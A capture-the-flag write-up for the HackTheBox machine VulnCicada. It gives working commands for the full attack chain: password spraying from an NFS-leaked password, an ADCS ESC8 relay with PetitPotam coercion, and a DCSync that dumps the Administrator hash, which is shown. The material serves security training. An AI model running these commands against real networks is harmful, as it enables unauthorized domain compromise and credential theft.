Post

HTB VulnCicada CTF Writeup

Medium-rated Windows Active Directory box. NFS exposes files leading to a password-sprayed foothold. PetitPotam coerces DC authentication to a relay server, exploiting ADCS ESC8 to issue a certificate for DCSync and full domain compromise.

HTB VulnCicada CTF Writeup

HTB VulnCicada CTF

Summary

VulnCicada is a Windows Active Directory machine on HackTheBox. An NFS share (/profiles) accessible to everyone exposes user profile directories and a screenshot containing a cleartext password on a sticky note. Password spraying with this credential against the enumerated usernames yields access as Rosie.Powell. With domain credentials, BloodHound enumeration reveals no direct privilege escalation paths, but certipy identifies the ADCS environment as vulnerable to ESC8 (HTTP-based Web Enrollment). Exploitation involves adding a DNS record via bloodyAD (leveraging the default Machine Account Quota), then using certipy’s relay mode to intercept coerced NTLM authentication from the DC (triggered via PetitPotam through NetExec’s coerce_plus module) and request a DomainController certificate. The resulting PFX authenticates as the DC machine account, whose NTLM hash is used to perform a DCSync attack with secretsdump.py, dumping the Administrator hash and granting full domain access via Evil-WinRM.

Service Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-11-21 12:38:13Z)
111/tcp   open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after:  2026-11-21T11:01:09
| MD5:   062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after:  2026-11-21T11:01:09
| MD5:   062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
2049/tcp  open  mountd        syn-ack 1-3 (RPC #100005)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after:  2026-11-21T11:01:09
| MD5:   062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-21T11:01:09
| Not valid after:  2026-11-21T11:01:09
| MD5:   062be88241bfd43e3899f8b31aa85280
| SHA-1: 499326b73a9b0ad86889929f855c4e1b494fe6ec
| -----BEGIN CERTIFICATE-----
| MII[SNIP]Pg==
|_-----END CERTIFICATE-----
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2025-11-21T12:39:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Issuer: commonName=DC-JPQ225.cicada.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-20T11:08:45
| Not valid after:  2026-05-22T11:08:45
| MD5:   81d21f14c1f8c89e5bc11f021549359a
| SHA-1: e0c517136684645a38cb105de242817a9441df26
| -----BEGIN CERTIFICATE-----
| MII[SNIP]3u0
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
54116/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
54117/tcp open  msrpc         syn-ack Microsoft Windows RPC
54134/tcp open  msrpc         syn-ack Microsoft Windows RPC
54204/tcp open  msrpc         syn-ack Microsoft Windows RPC
55815/tcp open  msrpc         syn-ack Microsoft Windows RPC
56055/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows

NFS Enumeration

The machine has a open share:

1
2
3
4
$ showmount -e DC-JPQ225

Export list for DC-JPQ225:
/profiles (everyone)

I mount the share locally:

1
sudo mount -t nfs DC-JPQ225:/profiles ./mount/

I list files in the mount to find possible users:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# ls -la mount/
total 14
drwxrwxrwx 2 nobody nogroup 4096 Jun  3 07:21 .
drwxr-xr-x 4 user   user    4096 Nov 21 08:12 ..
drwxrwxrwx 2 nobody nogroup   64 Sep 15  2024 Administrator
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Daniel.Marshall
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Debra.Wright
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Jane.Carter
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Jordan.Francis
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Joyce.Andrews
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Katie.Ward
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Megan.Simpson
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Richard.Gibbons
drwxrwxrwx 2 nobody nogroup   64 Sep 15  2024 Rosie.Powell
drwxrwxrwx 2 nobody nogroup   64 Sep 13  2024 Shirley.West

I save users.txt:

1
2
3
4
5
6
7
8
9
10
Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West

I locate files in the nfs share:

1
find mount/ -type f

It locates two image files:

1
2
mount/Rosie.Powell/marketing.png
mount/Administrator/vacation.png

I open marketing.png to find a password written in a sticky note:

image.webp

I write it down to “passwords.txt”:

1
Cicada123

Password Spraying

I password spray the new password:

1
nxc smb 10.129.234.48 -u users.txt -p passwords.txt --continue-on-success -k

Among the output, I see the password is valid for Rosie.Powell. I also notice how the error message for Shirley.West is different from the usual KDC_ERR_PREAUTH_FAILED:

1
2
SMB         10.129.234.48   445    DC-JPQ225        [+] cicada.vl\Rosie.Powell:Cicada123
SMB         10.129.234.48   445    DC-JPQ225        [-] cicada.vl\Shirley.West:Cicada123 KDC_ERR_CLIENT_REVOKED

Kerberos Configuration

I do use netexec to generate a proper krb5.conf file:

1
nxc smb 10.129.234.48 -u rosie.powell -p Cicada123 -k --generate-krb5-file krb5.conf

This is how it looks like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = CICADA.VL

[realms]
    CICADA.VL = {
        kdc = dc-jpq225.cicada.vl
        admin_server = dc-jpq225.cicada.vl
        default_domain = cicada.vl
    }

[domain_realm]
    .cicada.vl = CICADA.VL
    cicada.vl = CICADA.VL

Then I move it its proper directory, /etc/:

1
sudo mv krb5.conf /etc/

I get a TGT for rosie.powell:

1
getTGT.py cicada.vl/[email protected]

I rename it:

1
mv rosie.powell\@DC-JPQ225.cicada.vl.ccache rosie.powell.ccache

And export to the variable:

1
export KRB5CCNAME=./rosie.powell.ccache

LDAP Server Enumeration with Bloodhound

I use rusthound-ce to collect data about the domain

1
rusthound-ce -d cicada.vl -k -z -f DC-JPQ225.cicada.vl -c All

It returns me the zip file with the domain information. I ingest it in bloodhound, and take a look at it, but can’t find much.

ADCS Enumeration

Considering I was running out of options, I started enumerating ADCS.

1
certipy find -vulnerable -k -u [email protected] -p Cicada123 -dc-host dc-jpq225.cicada.vl -dc-ip 10.129.234.48

It saves a json file output to my CWD. I open it, and it tells me the ADCS environment is vulnerable to ESC8.

1
2
3
"[!] Vulnerabilities": {
        "ESC8": "Web Enrollment is enabled over HTTP."
      }

ADCS ESC8 Exploitation

I follow certipy’s wiki on ESC8 exploitation to understand how to exploit the vulnerability. I can add a DNS record to the dns server since the Machine Accont Quota is set to 10:

1
bloodyAD.py -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.57

I start certipy relay:

1
certipy relay -target http://10.129.234.48/ -template DomainController

Then coerce authentication with NetExec’s coerce_plus module:

1
nxc smb dc-jpq225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PetitPotam

It works:

image.webp

This works because the DC first tries using kerberos (which is unsupported), then tries using NTLM. The same attack could be performed using krbrelayx, if, for instance, NTLM authentication was disabled entirely:

1
python3 krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/ --template DomainController --adcs -dc-ip 10.129.234.48

image.webp

It would work with this certificate generated from krbrelayx:

1
certipy auth -pfx unknown6053.pfx -dc-ip 10.129.234.48

image.webp

And it would also work with the one generated via certipy itself:

1
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48

image.webp

Now I can use the NTLM hash for the DC machine account to perform a DCSYNC attack with secretsdump.py:

1
secretsdump.py -hashes :a65952c664e9cf5de60195626edbeee3 'cicada.vl/[email protected]' -k

image.webp

Get a TGT for Administrator:

1
getTGT.py cicada.vl/administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87

Connect via WINRM as Administrator (this needs /etc/krb5.conf set up properly):

1
evil-winrm -r CICADA.VL -u administrator -i dc-jpq225.cicada.vl

Flags are in C:\users\administrator\desktop

This post is licensed under CC BY 4.0 by the author.